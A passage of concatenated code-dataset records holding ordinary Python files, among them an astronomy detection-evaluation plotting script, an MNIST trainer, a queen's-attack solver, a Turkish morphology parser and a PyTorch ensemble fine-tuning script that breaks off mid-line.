16:\n mag15_16 += 1\n mag15_16_list.append(value)\n elif 16 <= value[3] < 17:\n mag16_17 += 1\n mag16_17_list.append(value)\n elif 17 <= value[3] < 18:\n mag17_18 += 1\n mag17_18_list.append(value)\n elif 18 <= value[3] < 19:\n mag18_19 += 1\n mag18_19_list.append(value)\n elif 19 <= value[3] < 20:\n mag19_20 += 1\n mag19_20_list.append(value)\n elif 20 <= value[3] < 21:\n mag20_21 += 1\n mag20_21_list.append(value)\n elif 21 <= value[3] < 22:\n mag21_22 += 1\n mag21_22_list.append(value)\n elif 22 <= value[3] < 23:\n mag22_23 += 1\n mag22_23_list.append(value)\n elif 23 <= value[3] < 24:\n mag23_24 += 1\n mag23_24_list.append(value)\n elif 24 <= value[3] < 25:\n mag24_25 += 1\n mag24_25_list.append(value)\n mag9_10_list = np.array(mag9_10_list)\n mag10_11_list = np.array(mag10_11_list)\n mag11_12_list = np.array(mag11_12_list)\n mag12_13_list = np.array(mag12_13_list)\n mag13_14_list = np.array(mag13_14_list)\n\n mag14_15_list = np.array(mag14_15_list)\n mag15_16_list = np.array(mag15_16_list)\n mag16_17_list = np.array(mag16_17_list)\n mag17_18_list = np.array(mag17_18_list)\n mag18_19_list = np.array(mag18_19_list)\n mag19_20_list = np.array(mag19_20_list)\n mag20_21_list = np.array(mag20_21_list)\n mag21_22_list = np.array(mag21_22_list)\n mag22_23_list = np.array(mag22_23_list)\n mag23_24_list = np.array(mag23_24_list)\n mag24_25_list = np.array(mag24_25_list)\n return \tmag9_10,mag10_11,mag11_12,mag12_13,mag13_14,mag14_15 ,mag15_16 ,mag16_17,mag17_18,mag18_19,\\\n mag19_20,mag20_21,mag21_22,mag22_23,mag23_24,mag24_25,\\\n mag9_10_list,mag10_11_list,mag11_12_list,mag12_13_list,mag13_14_list,mag14_15_list,mag15_16_list,mag16_17_list,mag17_18_list,mag18_19_list,\\\n mag19_20_list,mag20_21_list,mag21_22_list,\\\n mag22_23_list,mag23_24_list,mag24_25_list\n\n\nprecision_all_sex = np.zeros((16))\nrecall_all_sex = np.zeros((16))\nprecision_all_det = np.zeros((16))\nrecall_all_det = np.zeros((16))\nf1_score_all_sex = np.zeros(16)\nf1_score_all_det = np.zeros(16)\nf2_score_all_sex = np.zeros(16)\nf2_score_all_det = np.zeros(16)\n\n\n\n\nfor threhold in thresholds:\n det_list = glob.glob(os.path.join(file_path, \"*det_\" + str(threhold) + \".txt\"))\n list_list = glob.glob(os.path.join(file_path, '*.list'))\n fits_list = glob.glob(os.path.join(file_path, \"*fits.txt\"))\n det_file_num = len(det_list)\n list_file_num = len(list_list)\n fits_file_num = len(fits_list)\n if (det_file_num == list_file_num) and (fits_file_num == list_file_num):\n for count,single in enumerate(det_list):\n name_index = single.split(\"/\")[-1].split(\"_det_\"+str(threhold))[0]\n fits_txt_name = os.path.join(file_path,name_index+'.fits.txt')\n list_name = os.path.join(file_path,name_index+'.list')\n det_img = np.loadtxt(single)\n sex_img = np.loadtxt(fits_txt_name)\n list_img = np.loadtxt(list_name)\n\n mag9_10, mag10_11, mag11_12, mag12_13, mag13_14, mag14_15, mag15_16, mag16_17, mag17_18, mag18_19, \\\n mag19_20, mag20_21, mag21_22, mag22_23, mag23_24, mag24_25, \\\n mag9_10_list, mag10_11_list, mag11_12_list, mag12_13_list, mag13_14_list, mag14_15_list, mag15_16_list, mag16_17_list, mag17_18_list, mag18_19_list, \\\n mag19_20_list, mag20_21_list, mag21_22_list, \\\n mag22_23_list, mag23_24_list, mag24_25_list = compute_section_target(list_img)\n\n\n mag_all = [mag9_10, mag10_11, mag11_12, mag12_13, mag13_14, mag14_15, mag15_16, mag16_17, mag17_18, mag18_19, \\\n mag19_20, mag20_21, mag21_22, mag22_23, mag23_24, mag24_25]\n mag_all_list = [mag9_10_list, mag10_11_list, mag11_12_list, mag12_13_list, mag13_14_list, mag14_15_list, mag15_16_list, mag16_17_list, mag17_18_list, mag18_19_list, \\\n mag19_20_list, mag20_21_list, mag21_22_list, \\\n mag22_23_list, mag23_24_list, mag24_25_list, mag24_25_list]\n\n\n precision_sex = []\n recall_sex = []\n precision_det = []\n recall_det = []\n f1_score_sex = []\n f1_score_det = []\n f2_score_sex = []\n f2_score_det = []\n\n mag_nums_all = sum(mag_all)\n\n for step, value in enumerate(mag_all):\n list_list_img_index = mag_all_list[step]\n prec_sex, rec_sex = sex_list_match(sex_img, list_list_img_index, value)\n if value != 0:\n prec_sex = prec_sex * (mag_nums_all/value)\n if prec_sex > 1:\n prec_sex = 1\n else:\n prec_sex = 1\n ### recompute the precision\n if prec_sex != 0 and rec_sex != 0:\n f1_score_s = 2*prec_sex*rec_sex/(prec_sex+rec_sex)\n f2_score_s = (1+2*2) * prec_sex * rec_sex / (2*2*prec_sex + rec_sex)\n else:\n f1_score_s = 0\n f2_score_s = 0\n f1_score_sex.append(f1_score_s)\n f2_score_sex.append(f2_score_s)\n precision_sex.append(prec_sex)\n recall_sex.append(rec_sex)\n prec_det, rec_det = det_list_match(det_img, list_list_img_index, value)\n if value != 0:\n prec_det = prec_det * (mag_nums_all/value)\n if prec_det > 1:\n prec_det = 1\n else:\n prec_det = 1\n precision_det.append(prec_det)\n recall_det.append(rec_det)\n if prec_det != 0 and rec_det != 0:\n f1_score_d = 2*prec_det*rec_det/(prec_det+rec_det)\n f2_score_d = (1 + 2 * 2) * prec_det * rec_det / (2 * 2 * prec_det + rec_det)\n else:\n f1_score_d = 0\n f2_score_d = 0\n f1_score_det.append(f1_score_d)\n f2_score_det.append(f2_score_d)\n precision_sex = np.array(precision_sex)\n recall_sex = np.array(recall_sex)\n precision_det = np.array(precision_det)\n recall_det = np.array(recall_det)\n f1_score_sex = np.array(f1_score_sex)\n f1_score_det = np.array(f1_score_det)\n f2_score_sex = np.array(f2_score_sex)\n f2_score_det = np.array(f2_score_det)\n\n precision_all_sex += precision_sex\n recall_all_sex += recall_sex\n precision_all_det += precision_det\n recall_all_det += recall_det\n f1_score_all_sex += f1_score_sex\n f1_score_all_det += f1_score_det\n f2_score_all_sex += f2_score_sex\n f2_score_all_det += f2_score_det\n\n precision_all_sex = precision_all_sex/(count+1)\n recall_all_sex = recall_all_sex/(count+1)\n precision_all_det = precision_all_det/(count+1)\n recall_all_det = recall_all_det/(count+1)\n f1_score_all_sex = f1_score_all_sex/(count+1)\n f1_score_all_det = f1_score_all_det/(count+1)\n f2_score_all_sex = f2_score_all_sex/(count+1)\n f2_score_all_det = f2_score_all_det/(count+1)\n\n\n x = np.arange(10.,26.,1)\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.plot(x, recall_all_sex,linewidth = '2',color='yellow',label=\"recall_sex\")\n ax1.plot(x, recall_all_det,linewidth = '2', color='green', label=\"recall_det\")\n a = ax1.legend(loc=\"upper right\")\n x_major_locator=MultipleLocator(1)\n ax1.xaxis.set_major_locator(x_major_locator)\n Have_mag24_25 = False\n if Have_mag24_25:\n ax1.set_xlim([9.,25.])\n else:\n ax1.set_xlim([9., 24.])\n ax1.set_ylim([0.,1.1])\n ax1.set_xlabel('Magnitude', fontsize=16)\n ax1.set_ylabel('Recall',fontsize=16)\n ax1.set_title(\"Recall-mag-Precision\",fontsize=16)\n ax2 = ax1.twinx() # this is the important function\n ax2.plot(x, precision_all_sex, linewidth = '2',color='red',label=\"precision_sex\")\n ax2.plot(x, precision_all_det, linewidth = '2',color='black', label=\"precision_det\")\n b = ax2.legend(loc=\"lower left\")\n ax2.set_ylim([0,1.1])\n ax2.set_ylabel('Precision',fontsize=16)\n ax2.set_xlabel('Same X for both Recall and Precision',fontsize=16)\n plt.savefig('/home/lab30202/lq/ai_future/low_exporsure_emsemble/fpn_resnet_detnet_v2/validation/match_visualization/sex_det_{}.jpg'.format(threhold))\n plt.close()\n\n # f1-score\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n ax1.plot(x, f1_score_all_sex, linewidth = '2',color='yellow', label=\"f1_score_sex\")\n ax1.plot(x, f1_score_all_det, linewidth = '2',color='green', label=\"f1_score_det\")\n ax1.plot(x, f2_score_all_sex, linewidth = '2',color='red', label=\"f2_score_sex\")\n ax1.plot(x, f2_score_all_det, linewidth = '2',color='black', label=\"f2_score_det\")\n a = ax1.legend(loc=\"lower left\")\n x_major_locator = MultipleLocator(1)\n ax1.xaxis.set_major_locator(x_major_locator)\n Have_mag24_25 = False\n if Have_mag24_25:\n ax1.set_xlim([9., 25.])\n else:\n ax1.set_xlim([9., 24.])\n ax1.set_ylim([0., 1.1])\n ax1.set_ylabel('f1/2_score',fontsize=16)\n ax1.set_title(\"f1/2-score-mag\",fontsize=16)\n ax1.set_xlabel('Magnitude', fontsize=16)\n plt.savefig('/home/lab30202/lq/ai_future/low_exporsure_emsemble/fpn_resnet_detnet_v2/validation/match_visualization/f1-score_{}.jpg'.format(threhold))\n plt.close()\nprint(\"completed!!!\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"tools/match_visualization/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":13313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"106250912","text":"from neural_network import neuralNetwork\nimport numpy as np\n\n\n# number of input, hidden and output nodes\ninput_nodes = 784 # 28*28\nhidden_nodes = 500\noutput_nodes = 10\n\n# learning rate is 0.3\nlearning_rate = 0.1\n\n# create instance of neural network\nn = neuralNetwork(input_nodes, hidden_nodes, output_nodes, learning_rate)\n\ntraining_data_file = open(\"mnist_dataset/mnist_train_100.csv\", \"r\")\ntraining_data_list = training_data_file.readlines()\ntraining_data_file.close()\n\n# train the neural network\n\n# epochs is the number of times the training data set is used for training\nepochs = 5\n\nfor e in range(epochs):\n # go through all records in the training data set\n for record in training_data_list:\n # split the record by ',' commas\n all_values = record.split(',')\n # scale and shift the inputs\n inputs = (np.asfarray(all_values[1:]) / 255.0 * 0.99) + 0.01\n # create the target output values (all 0.01, expert the desired label which is 0.99)\n targets = np.zeros(output_nodes) + 0.01\n # all_values[0] is the target label for this record\n targets[int(all_values[0])] = 0.99\n n.train(inputs, targets)\n\nsave_wih_file = \"save_model/wih.npy\"\nnp.save(save_wih_file, n.wih)\nsave_who_file = \"save_model/who.npy\"\nnp.save(save_who_file, n.who)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"441440843","text":"# This Function is slower because we have used lists, lists are slower while finding any item then set\r\n\r\ndef slowQueensAttack(n, k, r_q, c_q, obstacles):\r\n moves=0\r\n \r\n if n==0:\r\n return 0\r\n\r\n directions=[(1,0),(-1,0),(0,1),(0,-1),(1,1),(-1,-1),(1,-1),(-1,1)]\r\n\r\n for i,j in directions:\r\n curr=[r_q+i,c_q+j]\r\n while 1<=curr[0]<=n and 1<=curr[1]<=n and [curr[0],curr[1]] not in obstacles:\r\n curr=[curr[0]+i,curr[1]+j]\r\n moves+=1\r\n\r\n\r\n return moves\r\n\r\ndef queensAttack(n, k, r_q, c_q, obstacles):\r\n moves=0\r\n \r\n if n==0:\r\n return 0\r\n\r\n ob=obstacles\r\n obstacles=set(tuple(i) for i in ob)\r\n\r\n directions={(1,0),(1,1),(0,1),(-1,1),(-1,0),(-1,-1),(0,-1),(1,-1)}\r\n\r\n for i,j in directions:\r\n curr=(r_q+i,c_q+j)\r\n while 1<=curr[0]<=n and 1<=curr[1]<=n and (curr[0],curr[1]) not in obstacles:\r\n curr=(curr[0]+i,curr[1]+j)\r\n moves+=1\r\n\r\n\r\n return moves\r\n\r\nprint(queensAttack(5, 3, 4, 3, [[5, 5], [4, 2], [2, 3]]))\r\nprint(queensAttack(10000,0,4187,5068,[])) ","sub_path":"queensAttack.py","file_name":"queensAttack.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"561108959","text":"from ftw.upgrade import UpgradeStep\nfrom opengever.core.upgrade import NightlyWorkflowSecurityUpdater\n\n\nclass UpdateLimitedAdminRole(UpgradeStep):\n \"\"\"Update limited admin role.\n \"\"\"\n\n def __call__(self):\n self.install_upgrade_profile()\n with NightlyWorkflowSecurityUpdater(reindex_security=False) as updater:\n updater.update(['opengever_dossier_workflow',\n 'opengever_repository_workflow',\n 'opengever_repositoryroot_workflow',\n 'opengever_templatefolder_workflow'])\n","sub_path":"opengever/core/upgrades/20220506101515_update_limited_admin_role/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"329522792","text":"from Utility.UtilityDataStructures import UtilityDataStructures\nutil = UtilityDataStructures()\nflag: bool = True\nwhile flag:\n\n try:\n list1 = []\n print(\"Enter the number of entries\")\n num_input = util.get_positive_integer()\n for counter in range(0, num_input):\n list1.append(input(\"Enter the string\"))\n # calling function to get the length of the longest string\n print(\"length of the longest string is \", util.longest_string(list1))\n except Exception as e:\n print(\"Process stopped because %s\" % e)\n print(\"To exit press 0 else press any other number\")\n if input() == 0:\n flag = False\n","sub_path":"Week2/StringQ5.py","file_name":"StringQ5.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"331374871","text":"import matplotlib.pyplot as plt\nfrom math_utilites import mp, mpf, linspace\nfrom constants import Borders\nfrom old_orthotropy.method import get_solution, Timer, find_dots\nfrom mpmath import MPContext\n\nM = 3\n#mp = MPContext()\nmp.prec = 1500\nh = 5\na = 10\n\n# Углеводородная пластина\nE_x = 220 * 10**9\nE_y = 6.9 * 10**9\nG_xy = 5 * 10**9\nnu_xy = 0.008\n\n# # Березовая фанера\n# E_x = 1.2 * 10**5\n# E_y = 0.6 * 10**5\n# G_xy = 0.07 * 10**5\n# nu_xy = 0.036\n\nfor name in ['E_x', 'E_y', 'G_xy', 'nu_xy', 'h', 'a']:\n globals()[name] = mpf(globals()[name])\n\nconditions = {\n Borders.UPPER: {\n 'sigma_x': lambda y: 1,\n 'tau': lambda *_: 0\n },\n Borders.BOTTOM: {\n 'sigma_x': lambda *_: 0,\n 'tau': lambda *_: 0\n },\n Borders.LEFT: {\n 'u': lambda *_: 0,\n 'v': lambda *_: 0\n },\n Borders.RIGHT: {\n 'u': lambda *_: 0,\n 'v': lambda *_: 0\n }\n}\n\n##########################################\nsolution = get_solution(M, h, a, E_x, E_y, G_xy, nu_xy, conditions, report=True)\n\nimport tkinter\n\nfrom gui.graphs import create_graph_frame\n\nin_dots = [y for x, y in find_dots(h, a, M)[Borders.UPPER]['sigma_x']]\ndots = [\n in_dots*2,\n (\n [conditions[Borders.BOTTOM]['sigma_x'](y) for y in in_dots]\n + [conditions[Borders.BOTTOM]['sigma_x'](y) for y in in_dots]\n )\n]\n\ncreate_graph_frame(\n tkinter.Tk(),\n func_name='sigma_x',\n var_name='y',\n func=solution[2],\n h=h,\n a=a\n).pack(expand=True, fill='both')\ntkinter.mainloop()\n\n'''\nsigma_x = get_solution(M, h, a, E_x, E_y, G_xy, nu_xy, conditions, report=True)[2]\n\ntimer = Timer()\nprint(\"Plotting graph...\")\ntimer.start()\n\ny_dots = linspace(0, a, 200)\n\nlist_of_vals = []\nfor x in [i*h/4 for i in range(5)]:\n list_of_vals.append(\n [sigma_x(x, y) for y in y_dots]\n )\n\nfor vals in list_of_vals:\n plt.plot(y_dots, vals)\n\ndots = find_dots(h, a, M)[Borders.UPPER]['sigma_x']\nplt.plot(\n [y for x, y in dots],\n [conditions[Borders.BOTTOM]['sigma_x'](y) for x, y in dots],\n '*'\n)\nplt.plot(\n [y for x, y in dots],\n [conditions[Borders.UPPER]['sigma_x'](y) for x, y in dots],\n '*'\n)\n\nprint(f'(done in {timer})')\nplt.show()\n'''","sub_path":"old_orthotropy/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"193275685","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom nets import nets_factory\n\nslim = tf.contrib.slim\n\n\nclass NetworksTest(tf.test.TestCase):\n\n def testGetNetworkFn(self):\n batch_size = 5\n num_classes = 1000\n for net in nets_factory.networks_map:\n with self.test_session():\n net_fn = nets_factory.get_network_fn(net, num_classes)\n # Most networks use 224 as their default_image_size\n image_size = getattr(net_fn, 'default_image_size', 224)\n inputs = tf.random_uniform(\n (batch_size, image_size, image_size, 3))\n logits, end_points = net_fn(inputs)\n self.assertTrue(isinstance(logits, tf.Tensor))\n self.assertTrue(isinstance(end_points, dict))\n self.assertEqual(logits.get_shape().as_list()[0], batch_size)\n self.assertEqual(logits.get_shape().as_list()[-1], num_classes)\n\n def testGetNetworkFnArgScope(self):\n batch_size = 5\n num_classes = 10\n net = 'cifarnet'\n with self.test_session(use_gpu=True):\n net_fn = nets_factory.get_network_fn(net, num_classes)\n image_size = getattr(net_fn, 'default_image_size', 224)\n with slim.arg_scope([slim.model_variable, slim.variable],\n device='/CPU:0'):\n inputs = tf.random_uniform(\n (batch_size, image_size, image_size, 3))\n net_fn(inputs)\n weights = tf.get_collection(\n tf.GraphKeys.GLOBAL_VARIABLES, 'CifarNet/conv1')[0]\n self.assertDeviceEqual('/CPU:0', weights.device)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"Dense_Motion_Estimation/3D Motion Estimation/slim/nets/nets_factory_test.py","file_name":"nets_factory_test.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"433429319","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/turkish_morphology/decompose.py\n# Compiled at: 2020-03-21 14:08:46\n# Size of source mod 2**32: 5797 bytes\n\"\"\"Functions to parse human-readable analyses into analysis protobuf messages.\n\"\"\"\nimport re\nfrom typing import Generator\nfrom turkish_morphology import analysis_pb2\n_Affix = analysis_pb2.Affix\n_Analysis = analysis_pb2.Analysis\n_AFFIX_REGEX = re.compile(\"[\\\\+-](?P(?:[^\\\\W\\\\d_]|['\\\\.])*?)\\\\[(?P[A-z]+?)=(?P[A-z0-9]+?)\\\\]\")\n_IG_REGEX = re.compile('\\\\((?:(?P.+?)\\\\[(?P[A-Z\\\\.,:\\\\(\\\\)\\\\\\'\\\\-\\\\\"`\\\\$]+?)\\\\]|\\\\[(?P[A-Z\\\\.,:\\\\(\\\\)\\\\\\'\\\\-\\\\\"`\\\\$]+?)\\\\](?P-(?:[^\\\\W\\\\d_]|\\')+?\\\\[[A-z]+?=[A-z]+?\\\\])?)(?P(?:\\\\+(?:[^\\\\W\\\\d_]|[\\'\\\\.])*?\\\\[[A-z]+?=[A-z0-9]+?\\\\])*)\\\\)(?:\\\\+\\\\[Proper=(?PTrue|False)\\\\])?')\n\nclass IllformedHumanReadableAnalysisError(Exception):\n __doc__ = 'Raised when a human-readable analysis is structurally ill-formed.'\n\n\ndef _make_affix(human_readable: str) -> Generator[(_Affix, None, None)]:\n \"\"\"Parses a sequence of human-readable affix analyses into affix protobuf.\n\n To illustrate, for the given human-readable analysis of below sequence of\n inflectional affixes;\n\n '+lAr[PersonNumber=A3pl]+Hm[Possessive=P1sg]'\n\n this function generates the corresponding affix protobufs;\n\n affix {\n feature {\n category: 'PersonNumber'\n value: 'A3pl'\n }\n meta_morpheme: 'lAr'\n }\n affix {\n feature {\n category: 'Possessive'\n value: 'P1sg'\n }\n meta_morpheme: 'Hm'\n }\n\n Args:\n human_readable: human-readable analysis for a sequence of derivational or\n inflectional morphemes (e.g. '-DHk[Derivation=PastNom]' or\n '+lAr[PersonNumber=A3pl]+Hm[Possessive=P1sg]+NDAn[Case=Abl]').\n\n Yields:\n Affix protobuf messages that are constructed from the human-readable affix\n analyses.\n \"\"\"\n matches = (m.groupdict() for m in _AFFIX_REGEX.finditer(human_readable))\n for matching in matches:\n affix = _Affix()\n affix.feature.category = matching['category']\n affix.feature.value = matching['value']\n if matching['meta_morpheme']:\n affix.meta_morpheme = matching['meta_morpheme']\n yield affix\n\n\ndef human_readable_analysis(human_readable: str) -> _Analysis:\n \"\"\"Parses given human-readable analysis into an analysis protobuf.\n\n To illustrate, for the given human-readable analysis;\n\n '(Ali[NNP]+lAr[PersonNumber=A3pl]+[Possessive=Pnon]\n +NHn[Case=Gen])+[Proper=True]'\n\n this function makes the corresponding analysis protobuf;\n\n inflectional_group {\n pos: 'NNP'\n root {\n morpheme: 'Ali'\n }\n inflection {\n feature {\n category: 'PersonNumber'\n value: 'A3pl'\n }\n meta_morpheme: 'lAr'\n }\n inflection {\n feature {\n category: 'Possessive'\n value: 'Pnon'\n }\n }\n inflection {\n feature {\n category: 'Case'\n value: 'Gen'\n }\n meta_morpheme: 'NHn'\n }\n proper: true\n }\n\n For the structure of the output analysis protobufs, see:\n\n //turkish_morphology/analysis.proto\n\n Args:\n human_readable: human-readable morphological analysis.\n\n Raises:\n IllformedHumanReadableAnalysisError: given human-readable morphological\n analysis is structurally ill-formed (e.g. missing part-of-speech tag,\n root form, derivational/inflectional morpheme, or feature category/value,\n etc.).\n\n Returns:\n Analysis protobuf message that is constructed from the human-readable\n analysis.\n \"\"\"\n if not human_readable:\n raise IllformedHumanReadableAnalysisError('Human-readable analysis is empty.')\n igs = tuple(_IG_REGEX.finditer(human_readable))\n matches = [ig.groupdict() for ig in igs]\n if not (igs and len(human_readable) == igs[(-1)].end() and matches[0]['root'] and matches[0]['root_pos'] and all((m['derivation'] for m in matches[1:])) and all((m['derivation_pos'] for m in matches[1:]))):\n raise IllformedHumanReadableAnalysisError(f\"Human-readable analysis is ill-formed: '{human_readable}'\")\n analysis = _Analysis()\n for position, matching in enumerate(matches):\n ig = analysis.ig.add()\n if position == 0:\n ig.pos = matching['root_pos']\n ig.root.morpheme = matching['root']\n else:\n ig.pos = matching['derivation_pos']\n derivation = tuple(_make_affix(matching['derivation']))[0]\n ig.derivation.CopyFrom(derivation)\n inflections = _make_affix(matching['inflections'])\n ig.inflection.extend(inflections)\n if matching['proper']:\n ig.proper = matching['proper'] == 'True'\n\n return analysis","sub_path":"pycfiles/turkish_morphology-1.2.1-py3.7/decompose.cpython-37.py","file_name":"decompose.cpython-37.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"231142691","text":"\"\"\"Helper functions for the application.\"\"\"\n\n\nimport re\n\n\ndef validate_url(url_string):\n \"\"\"Validate a url through regex.\"\"\"\n regex = re.compile(\n r'^(?:http|ftp)s?://'\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|'\n r'localhost|'\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})'\n r'(?::\\d+)?'\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n url_list = regex.findall(url_string)\n if url_list:\n return url_list[0]\n else:\n return None\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"8186776","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# External Libraries\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.nn as nn\nfrom PIL import Image\nimport numpy as np\nimport torch\n\n# Standard Libraries\nfrom os import path, makedirs\nimport copy\n\n# Modules\nfrom model.utils import udata, umath\nfrom model.ml.esr_9 import ESR\nfrom ensemble_network import Ensemble\n\n\ndef evaluate(val_model_eval, val_loader_eval, val_criterion_eval, device_to_process=\"cpu\", \n current_branch_on_training_val=0):\n \"\"\"\n Evaluate on the validation set. \n \"\"\"\n running_val_loss = [0.0 for _ in range(val_model_eval.get_ensemble_size())]\n running_val_corrects = [0 for _ in range(val_model_eval.get_ensemble_size() + 1)]\n running_val_steps = [0 for _ in range(val_model_eval.get_ensemble_size())]\n\n labels_all, preds_all = [], []\n for inputs_eval, labels_eval in val_loader_eval:\n inputs_eval, labels_eval = inputs_eval.to(device_to_process), labels_eval.to(device_to_process)\n outputs_eval = val_model_eval(inputs_eval)\n outputs_eval = outputs_eval[:val_model_eval.get_ensemble_size() - current_branch_on_training_val]\n\n # Ensemble prediction\n overall_preds = torch.zeros(outputs_eval[0].size()).to(device_to_process)\n for o_eval, outputs_per_branch_eval in enumerate(outputs_eval, 0):\n _, preds_eval = torch.max(outputs_per_branch_eval, 1)\n\n running_val_corrects[o_eval] += torch.sum(preds_eval == labels_eval).cpu().numpy()\n loss_eval = val_criterion_eval(outputs_per_branch_eval, labels_eval)\n running_val_loss[o_eval] += loss_eval.item()\n running_val_steps[o_eval] += 1\n\n for v_i, v_p in enumerate(preds_eval, 0):\n overall_preds[v_i, v_p] += 1\n\n # Compute accuracy of ensemble predictions\n _, preds_eval = torch.max(overall_preds, 1)\n running_val_corrects[-1] += torch.sum(preds_eval == labels_eval).cpu().numpy()\n labels_all.extend(labels_eval)\n preds_all.extend(preds_eval)\n\n for b_eval in range(val_model_eval.get_ensemble_size()):\n div = running_val_steps[b_eval] if running_val_steps[b_eval] != 0 else 1\n running_val_loss[b_eval] /= div\n\n return running_val_loss, running_val_corrects, labels_all, preds_all\n\n\ndef main():\n base_path_experiment = \"./experiments/self_data/\"\n name_experiment = \"ESR_9-sample\"\n base_path_to_dataset = \"./self_data/\"\n num_branches_trained_network = 9\n validation_interval = 2\n max_training_epoch = 2\n current_branch_on_training = 8\n\n # Make dir\n if not path.isdir(path.join(base_path_experiment, name_experiment)):\n makedirs(path.join(base_path_experiment, name_experiment))\n\n # Define transforms\n data_transforms = [transforms.ColorJitter(brightness=0.5, contrast=0.5),\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomAffine(degrees=30,\n translate=(.1, .1),\n scale=(1.0, 1.25),\n resample=Image.BILINEAR)]\n\n # Running device\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n print(\"Starting: {}\".format(str(name_experiment)))\n print(\"Running on {}\".format(device))\n\n # Load network trained on AffectNet - \n # load_path can indicate the path where the network needs to be loaded from.\n load_path = None\n net = Ensemble.load(device, num_branches_trained_network, load_path)\n\n # Send params to device\n net.to_device(device)\n\n # Set optimizer\n optimizer = optim.SGD([{\"params\": net.base.parameters(), \"lr\": 0.1, \"momentum\": 0.9},\n {\"params\": net.branches[0].parameters(), \"lr\": 0.1, \"momentum\": 0.9}])\n for b in range(1, net.get_ensemble_size()):\n optimizer.add_param_group({\"params\": net.branches[b].parameters(), \"lr\": 0.02, \"momentum\": 0.9})\n\n # Define criterion\n criterion = nn.CrossEntropyLoss()\n\n # Load validation set\n # max_loaded_images_per_label=100000 loads the whole validation set\n val_data = udata.Sample(idx_set=1,\n max_loaded_images_per_label=1000,\n transforms=None,\n base_path_to_sample=base_path_to_dataset)\n val_loader = DataLoader(val_data, batch_size=16, shuffle=False, num_workers=8)\n\n # Fine-tune ESR-9\n for branch_on_training in range(num_branches_trained_network):\n # Load training data\n train_data = udata.Sample(idx_set=0,\n max_loaded_images_per_label=5000,\n transforms=transforms.Compose(data_transforms),\n base_path_to_sample=base_path_to_dataset)\n train_batch_size = 16\n\n # Best network\n best_ensemble = net.to_state_dict()\n best_ensemble_acc = 0.0\n\n # Initialize scheduler\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=10, gamma=0.75, last_epoch=-1)\n\n # History\n history_loss = []\n history_acc = [[] for _ in range(net.get_ensemble_size())]\n history_val_loss = [[] for _ in range(net.get_ensemble_size())]\n history_val_acc = [[] for _ in range(net.get_ensemble_size() + 1)]\n\n # Training branch\n for epoch in range(max_training_epoch):\n train_loader = DataLoader(train_data, batch_size=train_batch_size, shuffle=True, num_workers=8)\n\n running_loss = 0.0\n running_corrects = [0.0 for _ in range(net.get_ensemble_size())]\n running_updates = 0\n\n idx = 1\n\n for inputs, labels in train_loader:\n # Get the inputs\n # print(inputs, labels)\n inputs, labels = inputs.to(device), labels.to(device)\n\n # Set gradients to zero\n optimizer.zero_grad()\n\n # Forward\n outputs = net(inputs)\n confs_preds = [torch.max(o, 1) for o in outputs]\n\n # Compute loss\n loss = 0.0\n for i_4 in range(net.get_ensemble_size() - current_branch_on_training):\n preds = confs_preds[i_4][1]\n running_corrects[i_4] += torch.sum(preds == labels).cpu().numpy()\n loss += criterion(outputs[i_4], labels)\n\n # Backward\n loss.backward()\n\n # Optimize\n optimizer.step()\n\n # Save loss\n running_loss += loss.item()\n running_updates += 1\n print(\"Number: {:d}, Loss: {:.4f}\".format(train_batch_size * idx, loss.item()))\n idx += 1\n\n scheduler.step()\n # Statistics\n print(\"[Branch {:d}, Epochs {:d}--{:d}] \"\n \"Loss: {:.4f} Acc: {}\".format(net.get_ensemble_size() - current_branch_on_training,\n epoch + 1,\n max_training_epoch,\n running_loss / running_updates,\n np.array(running_corrects) / len(train_data)))\n # Validation\n if ((epoch % validation_interval) == 0) or ((epoch + 1) == max_training_epoch):\n net.eval()\n\n val_loss, val_corrects, _, _ = evaluate(net, val_loader, criterion, device, current_branch_on_training)\n\n print(\"\\nValidation - 